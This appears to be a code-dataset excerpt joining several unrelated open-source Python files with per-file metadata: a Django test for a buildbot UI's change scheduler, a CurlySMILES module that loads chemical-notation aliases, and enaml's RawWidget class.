return trajectory_fn(x, steps, repeated_length)
return _trajectory_fn
| apache-2.0 | 106,992,124,681,665,070 | 34.6 | 80 | 0.71844 | false |
shawnchin/bbotui | web/bbotui/tests/models/test_model_scheduler_change.py | 1 | 3506 | from django.db import IntegrityError
from django.utils.translation import ugettext_lazy as _
from generic import BbotuiModelTestCase
from bbotui import settings
from bbotui.models import Builder, GitRepository, SVNRepository
from bbotui.models import Scheduler, ChangeScheduler
class TestChangeScheduler(BbotuiModelTestCase):
"""
Test Change Scheduler
"""
def test_simple_creation(self):
"""
Basic Change based scheduler
"""
sched = ChangeScheduler(project = self.project, name = "change")
sched.save()
self.assertNotEqual(sched.id, None)
self.assertEqual(unicode(sched), "change")
self.assertEqual(sched.cast().get_config_type(), _("change scheduler"))
# add builders
builders = ["builder1", "builder2", "builder3"]
for bname in builders:
b = Builder(project=self.project, name=bname)
b.save()
sched.builders.add(b)
self.assertEqual(sched.builders.count(), len(builders))
args = sched.cast().get_config_args()
# check default arguments
self.assertEqual(args.get("name", None), "change")
self.assertEqual(args.get("treeStableTimer", None), settings.DEFAULT_TREE_STABLE_TIMER * 60)
# check builderName
bn = args.get("builderNames", [])
self.assertEqual(len(bn), len(builders))
for i,b in enumerate(builders):
self.assertEqual(bn[i], b)
# try instantiating buildbot config object
self.assert_valid_buildbot_config(sched.cast().get_config_class(), args)
# check filter class
self.assertEqual(sched.cast().get_filter_class(), None)
self.assertEqual(sched.cast().get_filter_args(), None)
# Check that the resulting config string is sensible
self.assert_config_string_executable(sched.cast())
self.assertEqual(None, sched.get_filter_str())
def test_with_repos_filter(self):
"""
Change scheduler which affects only a specific repository
"""
sched = ChangeScheduler(project = self.project, name = "change")
sched.save()
self.assertNotEqual(sched.id, None)
repo = GitRepository(project = self.project, name = "gitrepo",
url = "http://some.git.repo/project.git",
)
repo.save()
self.assertNotEqual(repo.id, None)
sched.limit_to_repository.add(repo)
repo2 = SVNRepository(project = self.project, name = "svnrepo",
url = "http://some.host/svn/project",
)
repo2.save()
self.assertNotEqual(repo2.id, None)
sched.limit_to_repository.add(repo2)
# check filter class
self.assertNotEqual(sched.cast().get_filter_class(), None)
self.assertNotEqual(sched.cast().get_filter_args(), None)
args = sched.cast().get_filter_args()
repolist = args.get("repository", [])
self.assertEqual(len(repolist), 2)
self.assertEqual(repolist[0], "http://some.git.repo/project.git")
self.assertEqual(repolist[1], "http://some.host/svn/project")
# try instantiating buildbot config object
self.assert_valid_buildbot_config(sched.cast().get_filter_class(), args)
# Check that the resulting config string is sensible
self.assert_config_string_executable(sched.cast())
| bsd-3-clause | 4,239,929,282,982,137,000 | 37.119565 | 100 | 0.615231 | false |
axeleratio/CurlySMILESpy | csm_aliases.py | 1 | 13621 | """
This file: csm_aliases.py
Last modified: October 21, 2010
Package: CurlySMILES Version 1.0.1
Author: Axel Drefahl
E-mail: [email protected]
Internet: http://www.axeleratio.com/csm/proj/main.htm
Python module csm_aliases manages primary and secondary
aliases, which are replaced by a component notation (SFN,
Composite, SMILES or annotated SMILES code), when a user
notation is turned into a work notation.
The central method is compnt_notation(self, sAlias)
to get the component notation for an alias.
Copyright (C) 2010 Axel Drefahl
This file is part of the CurlySMILES package.
The CurlySMILES package is free software: you can redistribute it
and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
The CurlySMILES package is distributed in the hope that it will be
useful, but WITHOUT ANY WARRANTY; without even the implied warranty
of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the CurlySMILES package.
If not, see <http://www.gnu.org/licenses/>.
"""
import sys, os
class AliasNotations:
def __init__(self,sCsmpyDir,assignDict=1):
"""
dictionaries with aliases:
dictPrimAliases with primary aliases
dictSecAliases with secondary aliases (for a secondary alias
a corresponding primary one must exist)
dictClientAliases with client-provided aliases
"""
self.sCsmpyDir = sCsmpyDir
self.dictPrimAliases = None
self.dictSecAliases = None
if assignDict == 1:
self.initDict()
def initDict(self):
self.dictPrimAliases = self.load_prim_aliases()
self.dictSecAliases = self.load_sec_aliases()
#===================================================================#
# LOAD aliases #
#===================================================================#
"""------------------------------------------------------------------
loadPrimAliases:
load primary aliases from dictionaries in python modules
located in directory aliases (relative to directory of this
module, which is expected to be in subdirectory csm/py);
return: dictAliases = {sAliasGroup: dictGroup,...}
sAliasGroup = alias group name such as neutral,
cation1p, anion1p, etc., equal to
module name in directory aliases;
dictGroup = {sPrimAlias:sSmiles,...}
"""
def load_prim_aliases(self):
(sDirAliases,lstPyMod) = self.get_module_paths('aliases')
# get all dictionaries with primary aliases
dictPrimAliases = {}
code0 = "sys.path.append('%s')" % sDirAliases
exec code0
for sPyMod in lstPyMod:
lstParts = sPyMod.split(os.sep)
sAliasGroup = lstParts[-1][0:-3]
code1 = "import %s" % sAliasGroup
exec code1
sClassName = sAliasGroup[0].upper() + sAliasGroup[1:]
sClassName = 'Alias' + sClassName
code2 = "oDict = %s.%s()" % (sAliasGroup,sClassName)
exec code2
dictPrimAliases[sAliasGroup] = oDict.getDict()
del oDict
return dictPrimAliases
"""------------------------------------------------------------------
load_sec_aliases:
load secondary aliases from dictionaries in python modules
located in directory secalia (relative to directory of this
this module, which is expected to be in subdirectory csm/py);
return: dictAliases = {sAliasGroup: dictGroup,...}
sAliasGroup = alias group name such as neutral,
cation1p, anion1p, etc., equal to
module name in directory aliases;
dictGroup = {sSecAlias:sPrimAlias,...}
"""
def load_sec_aliases(self):
(sDirAliases,lstPyMod) = self.get_module_paths('secalia')
# get all dictionaries with secondary aliases
dictSecAliases = {}
code0 = "sys.path.append('%s')" % sDirAliases
exec code0
for sPyMod in lstPyMod:
lstParts = sPyMod.split(os.sep)
sAliasGroup = lstParts[-1][0:-3]
# take only modules having a name starting with 'sec_'
if cmp(sAliasGroup[0:4],'sec_') == 0:
sAliasGroup = sAliasGroup[4:]
else:
continue
code1 = "import sec_%s" % sAliasGroup
exec code1
sClassName = sAliasGroup[0].upper() + sAliasGroup[1:]
sClassName = 'Alias' + sClassName
code2 = "oDict = sec_%s.%s()" % (sAliasGroup,sClassName)
exec code2
dictSecAliases[sAliasGroup] = oDict.getDict()
del oDict
return dictSecAliases
"""------------------------------------------------------------------
get_module_paths: find and list absolute path for
each alias module either in sub-directory
sSubdir = 'aliases' or 'secalia'
return: (sDirAliases,lstPyMod), where
sDirAliases is absolute path to subdirectory, and
lstPyMod is list of absolute paths to module files
"""
def get_module_paths(self,sSubdir):
# absolute path to aliases directory
sDirAliases = self.sCsmpyDir + os.sep + sSubdir
# get names of aliases modules
lstPyMod = []
lstFiles = []
lstFiles = os.listdir(sDirAliases)
for sFile in lstFiles:
if len(sFile) < 6 or sFile[-3:] != '.py':
continue
sCompletePath = sDirAliases + os.sep + sFile
if os.path.isfile(sCompletePath):
lstPyMod.append(sCompletePath)
return (sDirAliases,lstPyMod)
#===================================================================#
# LOOK-UP alias (and group-id) #
#===================================================================#
"""------------------------------------------------------------------
compnt_notation: look up alias
return: string with component notation; or
None, if alias not found
"""
def compnt_notation(self, sAlias):
(sCompntNotation,sGroupID) = \
self.compnt_notation_and_groupid(sAlias)
return sCompntNotation
"""------------------------------------------------------------------
compnt_notation_and_groupid: look up alias
return: (sCompntNotation,sGroupId) or (None,None), if not found
sCompntNotation = notation for alias replacement
sGroupId = alias group name such as neutral, cation1p,
anion1p,etc.
"""
def compnt_notation_and_groupid(self,sAlias):
sCompntNotation = None
sGroupId = None
# Primary alias first ...
(sCompntNotation,sGroupId) = self.lookup_as_prim_alias(sAlias)
# ... if not found ...
if sCompntNotation == None: # look up as secondary alias
(sPrimAlias,sCompntNotation,sGroupId) = \
self.lookup_as_sec_alias(sAlias)
return (sCompntNotation,sGroupId)
"""------------------------------------------------------------------
lookup_as_prim_alias:
return: (sCompntNotation,sGroupId) for primary alias or
(None,None) if not found
"""
def lookup_as_prim_alias(self,sPrimAlias):
for sGroupId in self.dictPrimAliases:
dict = self.dictPrimAliases[sGroupId]
if dict.has_key(sPrimAlias):
return (dict[sPrimAlias],sGroupId)
return (None,None)
"""------------------------------------------------------------------
lookup_as_prim_alias_by_groupid:
return: sCompntNotation for primary alias or None if not found
"""
def lookup_as_prim_alias_by_groupid(self,sPrimAlias,sGroupId):
if self.dictPrimAliases.has_key(sGroupId):
dict = self.dictPrimAliases[sGroupId]
if dict.has_key(sPrimAlias):
return dict[sPrimAlias]
else:
return None
"""------------------------------------------------------------------
lookup_as_sec_alias:
return: (sPrimAlias, sCompntNotation,sGroupId) for secondary alias
or (None,None,None) if not found
"""
def lookup_as_sec_alias(self,sSecAlias):
for sGroupId in self.dictSecAliases:
dict = self.dictSecAliases[sGroupId]
if dict.has_key(sSecAlias):
sPrimAlias = dict[sSecAlias]
sCompntNotation = \
self.lookup_as_prim_alias_by_groupid(sPrimAlias,sGroupId)
if sCompntNotation != None:
return (sPrimAlias,sCompntNotation,sGroupId)
return (None,None,None)
#===================================================================#
# MAKE alias dictionary containing primary and secondary aliases #
#===================================================================#
"""------------------------------------------------------------------
makeAliasDict: check consistency of alias-alias and alias-groupid
relations and make dictionary that has both
primary and secondary aliases as key, while value
is the corresponding primary alias (if key is a
primary alias then key and value are the same)
NOTE: this method is for use during development
and extension of alias dictionaries
return: (lstAmbig,dictAliases)
lstAmbig = list of lines, each line reporting an
ambiguity (multiply used alias name)
empty if no ambiguities
dictAliases: {sAlias: sPrimAlias,...}
sAlias = primary or secondary alias
sPrimAlias = primary alias corresponding
to sAlias
Note: client aliases are not considered here
"""
def makeAliasDict(self):
lstAmbig = []
dictAliases = {}
# primary aliases
dictPrimGroupId = {} # dict with first encountered group id
for sPrimGroupId in self.dictPrimAliases:
dictPrim = self.dictPrimAliases[sPrimGroupId]
for sPrimAlias in dictPrim:
if dictAliases.has_key(sPrimAlias):
sLine = '"%s" with two group ids: "%s" and "%s"' % \
(sPrimAlias,sPrimGroupId, dictPrimGroupId[sPrimAlias])
sLine += ' (both for primary alias)'
lstAmbig.append(sLine)
else:
dictPrimGroupId[sPrimAlias] = sPrimGroupId
dictAliases[sPrimAlias] = sPrimAlias
# secondary aliases
dictSecGroupId = {} # dict with first encountered group id
for sSecGroupId in self.dictSecAliases:
dictSec = self.dictSecAliases[sSecGroupId]
for sSecAlias in dictSec:
sPrimAliasCorresp = dictSec[sSecAlias]
# first, check if sec. alias was already used as prim. alias
if dictAliases.has_key(sSecAlias):
sLine = 'sec. alias "%s" ' % sSecAlias
sLine += 'with group id "%s" conflicts ' % sSecGroupId
sLine += 'with same-name prim. alias of group "%s"' % \
dictPrimGroupId[sSecAlias]
lstAmbig.append(sLine)
continue
# also make sure the corresp. prim. alias exists
elif not dictAliases.has_key(sPrimAliasCorresp):
sLine = 'sec. alias "%s" ' % sSecAlias
sLine += 'with group id "%s" ' % sSecGroupId
sLine += 'has no corresponding prim. alias '
sLine += 'named "%s"' % sPrimAliasCorresp
lstAmbig.append(sLine)
continue
else:
# also make sure prim. and sec. share same group id
(sSmiles,sGroupIdCorresp) = \
self.lookupAsPrimAlias(sPrimAliasCorresp)
if cmp(sSecGroupId,sGroupIdCorresp) != 0:
sLine = 'group id mismatch for sec. alias '
sLine += '"%s" in group "%s": ' % \
(sSecAlias,sSecGroupId)
sLine += 'corresp. prim. alias "%s" ' % \
sPrimAliasCorresp
sLine += 'is in group "%s"' % sGroupIdCorresp
lstAmbig.append(sLine)
continue
# check if sec. alias is used twice
if dictSecGroupId.has_key(sSecAlias):
sLine = '"%s" with two group ids: "%s" and "%s"' % \
(sSecAlias,sSecGroupId, dictSecGroupId[sPrimAlias])
sLine += ' (both for secondary alias)'
lstAmbig.append(sLine)
else:
dictSecGroupId[sSecAlias] = sSecGroupId
dictAliases[sSecAlias] = sPrimAliasCorresp
return (lstAmbig,dictAliases)
| gpl-3.0 | -908,742,521,821,812,900 | 41.170279 | 79 | 0.532046 | false |
ContinuumIO/ashiba | enaml/enaml/widgets/raw_widget.py | 1 | 2000 | #------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed, ForwardTyped
from .control import Control, ProxyControl
class ProxyRawWidget(ProxyControl):
""" The abstract definition of a proxy RawWidget object.
"""
#: A reference to the RawWidget declaration.
declaration = ForwardTyped(lambda: RawWidget)
def get_widget(self):
raise NotImplementedError
class RawWidget(Control):
""" A raw toolkit-specific control.
Use this widget when the toolkit backend for the application is
known ahead of time, and Enaml does provide an implementation of
the required widget. This can be used as a hook to inject custom
widgets into an Enaml widget hierarchy.
"""
#: A reference to the proxy Control object.
proxy = Typed(ProxyRawWidget)
def create_widget(self, parent):
""" Create the toolkit widget for the control.
This method should create and initialize the widget.
Parameters
----------
parent : toolkit widget or None
The parent toolkit widget for the control.
Returns
-------
result : toolkit widget
The toolkit specific widget for the control.
"""
raise NotImplementedError
def get_widget(self):
""" Retrieve the toolkit widget for the control.
Returns
-------
result : toolkit widget or None
The toolkit widget that was previously created by the
call to 'create_widget' or None if the proxy is not
active or the widget has been destroyed.
"""
if self.proxy_is_active:
return self.proxy.get_widget()
| bsd-3-clause | -7,873,307,924,841,414,000 | 29.30303 | 79 | 0.6015 | false |
Subsets and Splits